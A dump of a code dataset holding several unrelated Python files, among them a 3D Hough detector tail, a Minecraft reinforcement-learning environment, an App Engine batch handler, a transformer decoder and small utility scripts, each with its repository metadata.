\n error = error + curr_error\n \n #Can adjust threshold for correct detection accordingly\n if curr_error <= 20.0:\n correct_detections = correct_detections + 1\n else:\n incorrect_ac_num.append(ac_num)\n \n #Keep record of the information\n detection_pt_info[ac_num] = [optimal_pt, 
ground_truth[ac_num], curr_error]\n \n plt.close()\n \n \n '''\n print(\"======================================\")\n print(\"********SUMMARY OF PERFORMANCE********\")\n print(\"======================================\")\n \n print(\"Min Canny Threshold: \", MIN_CANNY_THRESHOLD)\n print(\"Max Canny Threshold: \", MAX_CANNY_THRESHOLD)\n print(\"Sigma Canny: \", std_dev_canny)\n print(\"Sigma Accumulator: \", std_dev)\n print(\"Sigma Edges: \", std_dev_edges)\n \n print(\"The squared error for this trial on the validation set is :\", error)\n print(\"The detection rate is: \" + str(correct_detections) + \"/\" + str(len(ground_truth.keys())))\n \n print(\"The Accession Numbers for Incorrect Detections are: \", incorrect_ac_num)\n print(\"Detection Point Information: \", detection_pt_info)\n '''\n\n #Output General Information to File\n f = open(image_dir_name + \"/summary.txt\",\"w\")\n f.write(\"======================================\\n\")\n f.write(\"********SUMMARY OF PERFORMANCE********\\n\")\n f.write(\"======================================\\n\")\n f.write(\"Min Canny Threshold: %s \\n\" % str(MIN_CANNY_THRESHOLD))\n f.write(\"Max Canny Threshold: %s \\n\" % str(MAX_CANNY_THRESHOLD))\n f.write(\"Sigma Canny: %s \\n\" % str(std_dev_canny))\n f.write(\"Sigma Accumulator: %s \\n\" % str(std_dev))\n f.write(\"Sigma Edges: %s \\n\\n\" % str(std_dev_edges))\n \n f.write(\"The squared error for this trial on the validation set is: %s \\n\\n\" % str(error))\n \n f.write(\"The number of correct detections is %s\" % correct_detections)\n f.write(\"/%s \\n\\n\" % str(len(ground_truth.keys())))\n \n f.write(\"Incorrect Accession Numbers: \\n\")\n for item in incorrect_ac_num:\n f.write(\"%s \" % str(item))\n\n f.write(\"\\n\\n\")\n f.write(\"Below are the detections points: \\n\")\n for key in detection_pt_info.keys():\n f.write(\"AC Num: %s Detected Point: \" % str(key))\n \n info = detection_pt_info[key]\n f.write(\"%s Actual Point: \" % str(info[0]))\n f.write(\"%s Error: \" %str(info[1]))\n f.write(\"%s\" % info[2])\n f.write(\"\\n\")\n \n f.close()\n \n #Create Excel Spreadsheet with Detection Information\n wb = openpyxl.Workbook()\n dest_filename = '../GHT/detection_pts_trial_' + str(MIN_CANNY_THRESHOLD) + '_' + str(MAX_CANNY_THRESHOLD) + '_' + str(std_dev_canny) + '_' + str(std_dev) + '_' + str(std_dev_edges) + '.xlsx'\n\n\n ws1 = wb.active\n ws1.append(['ac_num','x','y','z'])\n for key in detection_pt_info.keys():\n detected_pt = detection_pt_info[key][0]\n row = [key,detected_pt[0],detected_pt[1],detected_pt[2]]\n\n ws1.append(row)\n wb.save(dest_filename)\n \n \n#===================================================================================================\n#===================================================================================================\n","sub_path":"GHT/3DGeneralHough_multiprocess2.py","file_name":"3DGeneralHough_multiprocess2.py","file_ext":"py","file_size_in_byte":30669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"69020414","text":"\"\"\"\nlines_growing.py\nUse simple lines, each with two points\n\"\"\"\nimport random\nimport time\nfrom BlockW import *\nbW = BlockW()\n\nbW.slider(\"winH\", 0, 900, 2000)\nbW.slider(\"winW\", 0, 1400, 2000)\nbW.add(bW.window, size=(\"winW\", \"winH\"))\ntdly = 2 # Time between displays\nprint(\"Number of points shortened because of time limitations\")\nnpoints = 10 # Number of points to display\npoints = [] # array of points to create/display\nmaxval = 4. 
# Maximum (x,y,z) dimensional value\nminval = -maxval # Minimum (x,y,z) dimensional value\nfor i in range(npoints):\n xval = random.uniform(minval, maxval)\n yval = random.uniform(minval, maxval)\n zval = random.uniform(minval, maxval)\n points.append([xval,yval,zval])\n \n\nfor i in range(2, npoints+1, 1): # Loop over sub groups of all points\n for npt in range(2, i):\n for ip1 in range(0, npt-1): # First point of line\n ip2 = ip1 + 1\n pt = points[ip1]\n pt2 = points[ip2] # Second point of line\n cmd = bW.add(bW.line, bW.color(0,1,0))\n cmd.addPoint(pt[0], pt[1], pt[2])\n cmd.addPoint(pt2[0], pt2[1], pt2[2])\n print(\"display {} points\".format(i));\n bW.display()\n time.sleep(tdly)\n #bW.bExec.erase()\n \nprint(\"End of %d points\" % npoints);\n","sub_path":"BwSetupJython/lines_growing_1a.py","file_name":"lines_growing_1a.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"515992199","text":"from tthAnalysis.HiggsToTauTau.samples.tthAnalyzeSamples_2017 import samples_2017\n\nbdt_samples = [\n \"ttHToNonbb_M125_powheg\",\n \"ttHToNonbb_M125_powheg_ext1\",\n \"TTZJets_LO\",\n \"TTZJets_LO_ext1\",\n \"TTWJets_LO\",\n \"TTWJets_LO_ext1\",\n \"TTTo2L2Nu\",\n \"TTTo2L2Nu_PSweights\",\n \"TTToSemiLeptonic\",\n \"TTToSemiLeptonic_PSweights\",\n \"TTToHadronic\",\n \"TTToHadronic_PSweights\",\n]\n\nfor sample_name, sample_info in samples_2017.items():\n if sample_name == 'sum_events': continue\n sample_info[\"use_it\"] = sample_info[\"process_name_specific\"] in bdt_samples\n","sub_path":"python/samples/tthAnalyzeSamples_2017_BDT.py","file_name":"tthAnalyzeSamples_2017_BDT.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"173227604","text":"import ee\nimport unittest\nfrom eemont import featurecollection\n\nee.Initialize()\n\nclass Test(unittest.TestCase):\n \"\"\"Tests for `eemont` package.\"\"\"\n \n def test_MultiPointFromQuery(self):\n \"\"\"Test the MultiPointFromQuery constructor\"\"\"\n test = ee.FeatureCollection.MultiPointFromQuery('Colombia',user_agent = 'eemon-feature-test')\n self.assertIsInstance(test, ee.featurecollection.FeatureCollection)\n \nif __name__ == '__main__':\n unittest.main()","sub_path":"tests/test_featurecollection.py","file_name":"test_featurecollection.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"121007947","text":"try:\n from malmo import MalmoPython\nexcept:\n import MalmoPython\n import malmoutils\n\nfrom numpy.random import randint\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport os\nimport sys\nimport time\nimport json\nimport math\nimport pathlib\nimport gym, ray\nfrom Map_Final import OBS_SIZE, MAX_EPISODE_STEPS, Map\nfrom gym.spaces import Discrete, Box\nfrom ray.rllib.agents import ppo\n\n# Neural Network related\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom ray.rllib.models import ModelCatalog\nfrom ray.rllib.models.torch.torch_modelv2 import TorchModelV2\n\nDIAMOND_POS = []\nDESTINATION_Z = 10000\n\n\n# Neural Network Model\nclass MyModel(TorchModelV2, nn.Module):\n def __init__(self, *args, **kwargs):\n TorchModelV2.__init__(self, *args, **kwargs)\n nn.Module.__init__(self)\n\n # channel number is 4, 32 hidden channels\n self.conv1 = nn.Conv2d(4, 32, kernel_size=7, padding=3) # 32, 15, 15\n self.conv2 = nn.Conv2d(32, 
32, kernel_size=7, padding=3) # 32, 15, 15\n self.conv3 = nn.Conv2d(32, 32, kernel_size=7, padding=3) # 32, 15, 15\n # 7 is the action number\n self.policy_layer = nn.Linear(32*15*15, 7)\n self.value_layer = nn.Linear(32*15*15, 1)\n\n self.value = None\n\n def forward(self, input_dict, state, seq_lens):\n x = input_dict['obs'] # BATCH, 4, 15, 15\n\n x = F.relu(self.conv1(x)) # BATCH, 32, 15, 15\n x = F.relu(self.conv2(x))\n x = F.relu(self.conv3(x))\n\n x = x.flatten(start_dim=1) # BATCH, 7200\n\n policy = self.policy_layer(x) # BATCH, 7\n self.value = self.value_layer(x) # BATCH, 1\n\n return policy, state\n\n def value_function(self):\n return self.value.squeeze(1)\n\n\nclass MinecraftRunner(gym.Env):\n\n def __init__(self, env_config):\n # Static Parameters\n self.obs_size = OBS_SIZE\n self.max_episode_steps = MAX_EPISODE_STEPS\n self.log_frequency = 5\n self.action_dict = {\n 0: 'move 1', # Move forward\n 1: 'move 0',\n 2: 'turn 1', # Turn right\n 3: 'turn -1', # Turn left\n 4: 'use 1', # Start opening the gate\n 5: 'jump 1', # Start jumping\n 6: 'stop' # stop all current action\n }\n\n # Rllib Parameters\n self.action_space = Discrete(len(self.action_dict))\n self.observation_space = Box(0, 1, shape=(4, self.obs_size, self.obs_size), dtype=np.float32)\n\n # Malmo Parameters\n self.agent_host = MalmoPython.AgentHost()\n try:\n self.agent_host.parse(sys.argv)\n except RuntimeError as e:\n print('ERROR:', e)\n print(self.agent_host.getUsage())\n exit(1)\n\n self.obs = None\n self.open_gate = False\n self.jump_gate = False\n self.episode_step = 0\n self.episode_return = 0\n self.returns = []\n self.steps = []\n self.current_to_dest = DESTINATION_Z\n self.shortest_to_dest = DESTINATION_Z\n self.cur_POSX, self.cur_POSZ = 0.5, 0.5\n self.pre_POSX, self.pre_POSZ = 0.5, 0.5\n\n def reset(self):\n \"\"\"\n Resets the environment for the next episode.\n Returns\n observation: flattened initial observation\n \"\"\"\n # Reset Malmo\n world_state = self.init_malmo()\n\n # Reset Variables\n self.returns.append(self.episode_return)\n current_step = self.steps[-1] if len(self.steps) > 0 else 0\n self.steps.append(current_step + self.episode_step)\n self.episode_return = 0\n self.episode_step = 0\n\n # Log\n if len(self.returns) > self.log_frequency + 1 and \\\n len(self.returns) % self.log_frequency == 0:\n self.log_returns()\n\n # Get Observation\n self.obs, self.open_gate, self.jump_gate = self.get_observation(world_state)\n\n self.current_to_dest = DESTINATION_Z\n self.shortest_to_dest = DESTINATION_Z\n self.agent_host.sendCommand('chat /effect @p 7 3')\n self.agent_host.sendCommand('chat /gamerule naturalRegeneration false')\n time.sleep(1.0)\n\n return self.obs\n\n def init_malmo(self):\n \"\"\"\n Initialize new malmo mission.\n \"\"\"\n my_mission = MalmoPython.MissionSpec(self.GetXML(), True)\n my_mission_record = MalmoPython.MissionRecordSpec()\n my_mission.requestVideo(800, 500)\n my_mission.setViewpoint(1)\n\n max_retries = 3\n my_clients = MalmoPython.ClientPool()\n my_clients.add(MalmoPython.ClientInfo('127.0.0.1', 10000)) # add Minecraft machines here as available\n\n for retry in range(max_retries):\n try:\n self.agent_host.startMission(my_mission, my_clients, my_mission_record, 0, 'MatureRunner')\n break\n except RuntimeError as e:\n if retry == max_retries - 1:\n print(\"Error starting mission:\", e)\n exit(1)\n else:\n time.sleep(2)\n\n world_state = self.agent_host.getWorldState()\n while not world_state.has_mission_begun:\n time.sleep(0.1)\n world_state = 
self.agent_host.getWorldState()\n for error in world_state.errors:\n print(\"\\nError:\", error.text)\n\n return world_state\n\n def rotate(self, m, k): \n for l in range(4):\n top = 0\n bottom = self.obs_size - 1\n left = 0\n right = self.obs_size - 1\n while left < right and top < bottom: \n for i in range(k):\n prev = m[l][top+1][right] \n # Move top row one step left \n for i in range(right, left-1, -1): \n temp = m[l][top][i] \n m[l][top][i] = prev \n prev = temp \n # Move left column one step down \n for i in range(top, bottom+1): \n temp = m[l][i][left] \n m[l][i][left] = prev \n prev = temp \n # Move bottom row one step right \n for i in range(left, right+1): \n temp = m[l][bottom][i] \n m[l][bottom][i] = prev \n prev = temp \n # Move right column one step up \n for i in range(bottom, top-1, -1): \n temp = m[l][i][right] \n m[l][i][right] = prev \n prev = temp \n top += 1\n left += 1\n bottom -= 1\n right -= 1\n k -= 1\n return m\n\n def obs_diamond(self, agent_x, agent_z):\n # Get observation matrix and agent row/col\n sight = int((OBS_SIZE - 1) / 2)\n diamond_obs = np.zeros((OBS_SIZE, OBS_SIZE))\n agent_row = int(OBS_SIZE / 2)\n agent_col = int(OBS_SIZE / 2)\n\n # Mark diamond position 1\n for diamond_x, diamond_z in DIAMOND_POS:\n x_diff = diamond_x - int(agent_x)\n z_diff = diamond_z - int(agent_z)\n check_x = -sight <= x_diff <= sight\n check_z = -sight <= z_diff <= sight\n if check_x and check_z:\n diamond_row = z_diff + agent_row\n diamond_col = x_diff + agent_col\n diamond_obs[diamond_row, diamond_col] = 1\n\n return diamond_obs\n\n def update_diamond_list(self, agent_x, agent_z):\n flag = False\n for diamond_x, diamond_z in DIAMOND_POS:\n if diamond_x == agent_x and diamond_z == agent_z:\n DIAMOND_POS.remove((diamond_x, diamond_z))\n flag = True\n return flag\n\n def step(self, action):\n \"\"\"\n Take an action in the environment and return the results.\n Args\n action: index of the action to take\n Returns\n observation: flattened array of obseravtion\n reward: reward from taking action\n done: indicates terminal state\n info: dictionary of extra information\n \"\"\"\n\n # Get Action\n command = self.action_dict[action]\n if command not in ['use 1', 'jump 1', 'stop']:\n self.agent_host.sendCommand(command)\n time.sleep(0.1)\n elif (command == 'use 1' and self.open_gate) or \\\n (command == 'jump 1' and self.jump_gate):\n self.agent_host.sendCommand(command)\n time.sleep(0.1)\n elif command == 'stop':\n self.agent_host.sendCommand(\"use 0\")\n self.agent_host.sendCommand(\"jump 0\")\n self.agent_host.sendCommand(\"turn 0\")\n time.sleep(0.1)\n\n self.episode_step += 1\n\n # Get Observation\n old_dest = self.current_to_dest # Used for giving reward of moving to the destination\n old_shortest = self.shortest_to_dest\n world_state = self.agent_host.getWorldState()\n for error in world_state.errors:\n print(\"Error:\", error.text)\n self.obs, self.open_gate, self.jump_gate = self.get_observation(world_state)\n\n # Get Done\n done = not world_state.is_mission_running\n\n # Get Reward\n reward = 0\n for r in world_state.rewards:\n reward += r.getValue()\n\n # Reward of moving towards to the destination\n new_dest = self.current_to_dest\n new_shortest = self.shortest_to_dest\n if old_dest < new_dest:\n reward -= 0.5\n elif old_dest > new_dest:\n reward += 0.5\n\n if old_shortest < new_shortest:\n reward -= 1\n elif old_shortest > new_shortest:\n reward += 1\n\n self.episode_return += reward\n # Punish the agent if the agent remain stationary\n if math.sqrt((self.pre_POSX - 
self.cur_POSX) ** 2 +\n (self.pre_POSZ - self.cur_POSZ) ** 2) < 0.2:\n reward -= 0.2\n\n return self.obs, reward, done, dict()\n\n def get_observation(self, world_state):\n \"\"\"\n Use the agent observation API to get a 4 x 15 x 15 observation grid around the agent.\n The agent is in the center square facing up.\n Args\n world_state: current agent world state\n Returns\n observation: the state observation\n open_gate: whether the agent is facing a fence gate\n jump_gate: whether the agent is facing a fence it must jump\n \"\"\"\n obs = np.zeros((4, self.obs_size, self.obs_size))\n open_gate = False\n jump_gate = False\n\n while world_state.is_mission_running:\n time.sleep(0.1)\n world_state = self.agent_host.getWorldState()\n if len(world_state.errors) > 0:\n raise AssertionError('Could not load grid.')\n\n if world_state.number_of_observations_since_last_state > 0:\n # First we get the json from the observation API\n msg = world_state.observations[-1].text\n observations = json.loads(msg)\n while 'floorAll' not in observations:\n time.sleep(.1) # maybe increment this each time it fails\n world_state = self.agent_host.getWorldState()\n msg = world_state.observations[-1].text\n observations = json.loads(msg)\n\n # Get observation\n # Get block type grid\n grid = observations['floorAll']\n\n # Get agent position\n agent_x = observations['XPos']\n agent_z = observations['ZPos']\n\n # update previous position and current position\n self.pre_POSX, self.pre_POSZ = self.cur_POSX, self.cur_POSZ\n self.cur_POSX, self.cur_POSZ = agent_x, agent_z\n\n # Update shortest distance to destination if current distance is shorter\n self.current_to_dest = DESTINATION_Z - agent_z\n if DESTINATION_Z - agent_z < self.shortest_to_dest:\n self.shortest_to_dest = DESTINATION_Z - agent_z\n\n obs_list = ['fence_gate', 'dark_oak_fence', 'acacia_fence']\n obs = list(self.obs_diamond(agent_x, agent_z).flatten())\n for i in range(len(obs_list)):\n for x in grid:\n if x == obs_list[i]:\n obs.append(1.0)\n else:\n obs.append(0.0)\n obs = np.array(obs)\n obs = obs.reshape((len(obs_list) + 1, self.obs_size, self.obs_size))\n\n # Remove collected diamond's position from the list to avoid repeat reward\n self.update_diamond_list(agent_x, agent_z)\n\n # Rotate observation with orientation of agent\n yaw = observations['Yaw']\n\n if yaw >= 202.5 and yaw < 247.5:\n obs = self.rotate(obs, 7)\n elif yaw >= 247.5 and yaw < 292.5:\n obs = np.rot90(obs, k=1, axes=(1, 2))\n elif yaw >= 292.5 and yaw < 337.5:\n obs = self.rotate(obs, 21)\n elif yaw >= 337.5 or yaw < 22.5:\n obs = np.rot90(obs, k=2, axes=(1, 2))\n elif yaw >= 22.5 and yaw < 67.5:\n obs = self.rotate(obs, 35)\n elif yaw >= 67.5 and yaw < 112.5:\n obs = np.rot90(obs, k=3, axes=(1, 2))\n elif yaw >= 112.5 and yaw < 157.5:\n obs = self.rotate(obs, 49)\n\n if 'LineOfSight' in observations.keys():\n open_gate = observations['LineOfSight']['type'] == \"fence_gate\"\n jump_gate = observations['LineOfSight']['type'] == \"acacia_fence\"\n\n break\n\n return obs, open_gate, jump_gate\n\n def GetXML(self):\n global DIAMOND_POS\n XMLmap, DIAMOND_POS = Map()\n return XMLmap\n\n def log_returns(self):\n \"\"\"\n Log the current returns as a graph and text file\n Args:\n steps (list): list of global steps after each episode\n returns (list): list of total return of each episode\n \"\"\"\n box = np.ones(self.log_frequency) / self.log_frequency\n returns_smooth = np.convolve(self.returns[1:], box, mode='same')\n plt.clf()\n plt.plot(self.steps[1:], returns_smooth)\n plt.title('Mature Runner')\n plt.ylabel('Return')\n plt.xlabel('Steps')\n 
plt.savefig('returns.png')\n\n with open('returns.txt', 'w') as f:\n for step, value in zip(self.steps[1:], self.returns[1:]):\n f.write(\"{}\\t{}\\n\".format(step, value))\n\n\nif __name__ == '__main__':\n\n ModelCatalog.register_custom_model('my_model', MyModel)\n\n ray.init()\n trainer = ppo.PPOTrainer(env=MinecraftRunner, config={\n 'env_config': {}, # No environment parameters to configure\n 'framework': 'torch', # Use pytorch instead of tensorflow\n 'num_gpus': 0, # We aren't using GPUs\n 'num_workers': 0, # We aren't using parallelism\n 'model': {\n 'custom_model': 'my_model',\n 'custom_model_config': {}\n }\n\n })\n\n answer = input(\"Use last training result[Y/N]?\")\n if answer.lower() == \"y\":\n while True:\n dir_path = input(\"Training data path:\")\n if os.path.exists(dir_path):\n trainer.load_checkpoint(dir_path)\n break\n else:\n print(f\"Invalid path:{dir_path}\")\n\n current_directory = pathlib.Path(__file__).parent.absolute()\n\n i = 0\n while True:\n result = trainer.train()\n print(result)\n i += 1\n if i % 1 == 0:\n checkpoint = trainer.save_checkpoint(current_directory)\n print(\"checkpoint saved at\", checkpoint)","sub_path":"milestones/Runner1.py","file_name":"Runner1.py","file_ext":"py","file_size_in_byte":16023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"26860331","text":"#!/usr/bin/python\n# coding: utf-8\n\n__author__ = 'Thang Nguyen (thangnguyen.ttd@gmail.com)'\n\nimport time\nimport os\nimport jinja2\ncwd = os.path.dirname(__file__)\npath = os.path.join(cwd, 'templates')\njinja_environment = jinja2.Environment(\n\t\tloader=jinja2.FileSystemLoader(path))\nimport webapp2\nimport time\nimport datetime\nimport logging\nimport json\nimport gdata.alt.appengine\nimport gdata.apps.service\nfrom google.appengine.ext import ndb\nfrom google.appengine.ext import blobstore\nfrom google.appengine.api import users\nfrom google.appengine.api import namespace_manager\nfrom google.appengine.api import taskqueue\nfrom google.appengine.api.urlfetch import DownloadError\nfrom google.appengine.ext.db.metadata import Namespace\nfrom gdata.apps.service import AppsForYourDomainException\nfrom google.appengine.api import memcache\n\nimport sateraito_inc\nimport sateraito_page\nimport sateraito_func\nimport sateraito_db\n\n# prepare for max 500,000 namespaces\nNUM_PER_PAGE_NAMESPACE = 500\nMAX_PAGES_NAMESPACE = 1000\n\nfrom os.path import join, dirname, abspath\nROOT = abspath(dirname(__file__))\nfrom jinja2 import Environment, FileSystemLoader\n\nfrom faker import Faker\nfrom faker.factory import Factory\nfake = Faker()\nfake = Faker('en_US')\n\nfrom generate import GenerateDataHandler\n\nclass TqGeneralData(sateraito_page._BasePage):\n\tdef post(self):\n\t\t# check retry count\n\t\tretry_cnt = self.request.headers.environ['HTTP_X_APPENGINE_TASKRETRYCOUNT']\n\t\tlogging.info('retry_cnt=' + str(retry_cnt))\n\t\tif retry_cnt is not None:\n\t\t\tif(int(retry_cnt) > 3):\n\t\t\t\tlogging.error('error over_3_times.')\n\t\t\t\treturn\n\t\t# get param\n\t\tgenerate = self.request.get('generate', '')\n\t\tlogging.info('generate=' + str(generate))\n\n\t\tlogging.info('** start TqGeneralData')\n\n\t\tif generate != '':\n\t\t\tif generate == 'province':\n\t\t\t\tobjClass = GenerateDataHandler()\n\t\t\t\tobjClass.generate_provinces()\n\t\t\telif generate == 'district':\n\t\t\t\tobjClass = GenerateDataHandler()\n\t\t\t\tobjClass.generate_districts()\n\t\t\telif generate == 'ward':\n\t\t\t\tobjClass = 
GenerateDataHandler()\n\t\t\t\tobjClass.generate_districts()\n\n\t\t\tlogging.info('** FINISHED TqGeneralData')\n\t\t\treturn\n\n\t\tlogging.info('invalid generate parameter')\n\nclass StartGenerateData(sateraito_page._BasePage):\n\n\tdef callTaskQueue(self, task_url, task_params={}):\n\t\tdefault_q = taskqueue.Queue('default')\n\t\tt = taskqueue.Task(\n\t\t\turl=task_url,\n\t\t\tparams=task_params,\n\t\t\ttarget='default',\n\t\t\tcountdown=(1)\n\t\t)\n\t\tdefault_q.add(t)\n\n\tdef get(self):\n\t\t# set namespace\n\t\tif not self.setNamespace():\n\t\t\treturn\n\n\t\tif not self.isSuperAdmin(redirect_login=True):\n\t\t\tself.response.set_status(403)\n\t\t\treturn\n\n\t\t# check oid request\n\n\t\ttask_url = '/batch/tq/generatedata'\n\t\ttask_params = {\n\t\t\t'generate': 'province'\n\t\t}\n\t\tself.callTaskQueue(task_url, task_params)\n\n\t\ttask_url = '/batch/tq/generatedata'\n\t\ttask_params = {\n\t\t\t'generate': 'district'\n\t\t}\n\t\tself.callTaskQueue(task_url, task_params)\n\n\t\ttask_url = '/batch/tq/generatedata'\n\t\ttask_params = {\n\t\t\t'generate': 'ward'\n\t\t}\n\t\tself.callTaskQueue(task_url, task_params)\n\n\t\t# set response header\n\t\tself.response.headers['Content-Type'] = 'application/json'\n\t\tself.response.out.write(json.JSONEncoder().encode({'status': 'ok'}))\n\napp = ndb.toplevel(webapp2.WSGIApplication([\n\t\t\t\t\t\t\t('/batch/startgeneratedata$', StartGenerateData),\n\t\t\t\t\t\t\t('/batch/tq/generatedata$', TqGeneralData),\n\t\t\t\t\t\t\t], debug=sateraito_inc.debug_mode, config=sateraito_page.config))\n","sub_path":"src/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":3382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"531579000","text":"#This file will need to use the DataManager,FlightSearch, FlightData, NotificationManager classes to achieve the program requirements.\nfrom datetime import timedelta, date\nfrom flight_data import FlightData\nfrom flight_search import FlightSearch\n\ndeparture = input(\"What city will you be departing from: \")\ndestination = input(\"What city is your destination: \")\n\nnewFlight = FlightData(departure, destination)\nnewFlightDets = newFlight.constructor()\n\nnewSearch = FlightSearch()\ncodes = newSearch.find_codes(newFlightDets[\"Departure\"], newFlightDets[\"Destination\"])\n\ntoday = date.today()\ntommorow = today + timedelta(days=1)\nnextSixMonths = tommorow + timedelta(days=6*30)\ntommorow = tommorow.strftime(\"%d/%m/%Y\")\nnextSixMonths = nextSixMonths.strftime(\"%d/%m/%Y\")\n\nresult = newSearch.find_flights(codes[0], codes[1], tommorow, nextSixMonths)\nprint(result)\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"382501176","text":"my_list = list('Perl')\n\nmy_list[2:] = list('ar')\n\nprint(my_list) # ['P', 'e', 'a', 'r']\n\n# When you use slice assignments, you may also replace the slice with a sequence whose length is different from\n# that of the original.\n\nmy_list = list('Perl')\nmy_list[1:] = list('ython')\n\nprint(my_list) # ['P', 'y', 't', 'h', 'o', 'n']\n\n# Slice assignments can be used to insert elements without replacing any of the original ones.\n\nmy_list = [1,5]\nmy_list[1:1] = [2,3,4]\n\nprint(my_list) # [1, 2, 3, 4, 5]\n\n# You can do the reverse to delete a slice.\n\nmy_list[1:4] = []\n\nprint(my_list) # [1, 
5]\n\n","sub_path":"Python/lang/data_structures/lists/modifying/replace-with-slices.py","file_name":"replace-with-slices.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"278908827","text":"#!/usr/bin/env python3\r\n\"\"\"\r\nclass Decoder\r\n\"\"\"\r\nimport tensorflow as tf\r\npositional_encoding = __import__('4-positional_encoding').positional_encoding\r\nDecoderBlock = __import__('8-transformer_decoder_block').DecoderBlock\r\n\r\n\r\nclass Decoder(tf.keras.layers.Layer):\r\n    \"\"\"Class Decoder\"\"\"\r\n    def __init__(self, N, dm, h, hidden, target_vocab, max_seq_len,\r\n                 drop_rate=0.1):\r\n        \"\"\"\r\n        Parameters\r\n        ----------\r\n        N - the number of blocks in the encoder\r\n        dm - the dimensionality of the model\r\n        h - the number of heads\r\n        hidden - the number of hidden units in the fully connected layer\r\n        target_vocab - the size of the target vocabulary\r\n        max_seq_len - the maximum sequence length possible\r\n        drop_rate - the dropout rate\r\n        Sets the following public instance attributes:\r\n        N - the number of blocks in the encoder\r\n        dm - the dimensionality of the model\r\n        embedding - the embedding layer for the targets\r\n        positional_encoding - a numpy.ndarray of shape (max_seq_len, dm)\r\n            containing the positional encodings\r\n        blocks - a list of length N containing all of the DecoderBlocks\r\n        dropout - the dropout layer, to be applied to the positional encodings\r\n        Returns\r\n        -------\r\n        None\r\n        \"\"\"\r\n        super(Decoder, self).__init__()\r\n        self.N = N\r\n        self.dm = dm\r\n        self.embedding = tf.keras.layers.Embedding(target_vocab, dm)\r\n        self.positional_encoding = positional_encoding(max_seq_len, dm)\r\n        # build N independent blocks; list multiplication would reuse a single block N times\r\n        self.blocks = [DecoderBlock(dm, h, hidden, drop_rate) for _ in range(N)]\r\n        self.dropout = tf.keras.layers.Dropout(drop_rate)\r\n\r\n    def call(self, x, encoder_output, training,\r\n             look_ahead_mask, padding_mask):\r\n        \"\"\"\r\n        Parameters\r\n        ----------\r\n        Public instance method\r\n        x - a tensor of shape (batch, target_seq_len, dm) containing the input\r\n        to the decoder\r\n        encoder_output - a tensor of shape (batch, input_seq_len, dm) containing\r\n        the output of the encoder\r\n        training - a boolean to determine if the model is training\r\n        look_ahead_mask - the mask to be applied to the first multi head\r\n        attention layer\r\n        padding_mask - the mask to be applied to the second multi head\r\n        attention layer\r\n\r\n        Returns\r\n        -------\r\n        A tensor of shape (batch, target_seq_len, dm) containing the\r\n        decoder output\r\n        \"\"\"\r\n        seq_len = x.shape[1]\r\n        # apply the embedding to input x\r\n        x = self.embedding(x)\r\n        # scale x by sqrt of dm\r\n        x = x * tf.math.sqrt(tf.cast(self.dm, tf.float32))\r\n        # add the positional encoding\r\n        x = x + self.positional_encoding[:seq_len]\r\n        # apply dropout to everything\r\n        output = self.dropout(x, training=training)\r\n        for i in range(self.N):\r\n            output = self.blocks[i](output, encoder_output, training,\r\n                                    look_ahead_mask, padding_mask)\r\n        return output\r\n","sub_path":"supervised_learning/0x11-attention/10-transformer_decoder.py","file_name":"10-transformer_decoder.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"486340653","text":"# -*- coding: utf-8 -*-\n'''\n@ Copyright (C) 2018 EfonFighting(email:efonfighting@126.com)(android_wechat:Efon-fighting)\n@\n@ env setup:\n@ sudo apt-get install python3-pip\n@\n'''\n\ndef main():\n    print(\"main start\")\n    
caseFlg = 'url2pdf'\n    print(caseFlg)\n\n    if (caseFlg == 'douyin'):\n        from android_douyin import douyin\n        urlTxtPath = \"/home/soy/03_autoOpt_docs/douyin_Ina.txt\"\n        douyin.getUrlFromDouyin(urlTxtPath)\n        #douyin.getVideoFromTxt(\"out/douyin_Sia.txt\", 1, 80)\n        #douyin.uploadVideo2Qunmin('/home/soy/Videos/sihaiweijiazaiouzhou/sihaiweijiazaiouzhou.txt',\n        #                          '/home/soy/Videos/sihaiweijiazaiouzhou',26, 29)\n\n\n    if(caseFlg == 'getPointAxis'):\n        from pc_windows import screen_coordinate\n        screen_coordinate.getPointAxis()\n\n    if(caseFlg == 'getEssay'):\n        from android_wechat import get_gzh_essay\n        get_gzh_essay.getEssay('out/laodongfaku.txt',False)\n\n    if (caseFlg == 'url2pdf'):\n        from url2pdf import url2pdf\n        url2pdf.url2pdfLinux(\"out/laodongfaku.txt\", 101, 10000)\n\n\ndef test():\n    import time\n    # get the description\n    urlTxtFd = open('out/抖音_四海为家在欧洲.txt', 'r', encoding='utf-8')\n    lineTemps = urlTxtFd.readlines()\n    for lineTemp in lineTemps:\n        findRet = lineTemp.find('005')\n        print(findRet)\n        if(findRet != -1):\n            print(lineTemp)\n            time.sleep(1)\n\n\nif __name__ == \"__main__\":  # checks whether this file is being run directly by python\n    main()\n    #test()\n\n","sub_path":"auto_opt_main.py","file_name":"auto_opt_main.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"25820032","text":"#! /usr/bin/env python\nfrom __future__ import print_function\nimport sys\nline = sys.stdin.read()\n# check both markers explicitly; the original \"/*\" and \"*/\" in line tested only the second one\nif \"/*\" in line and \"*/\" in line:\n\tline = line.replace('/*','')\n\tline = line.replace('*/','')\n\tmsg = \"Code block in selection 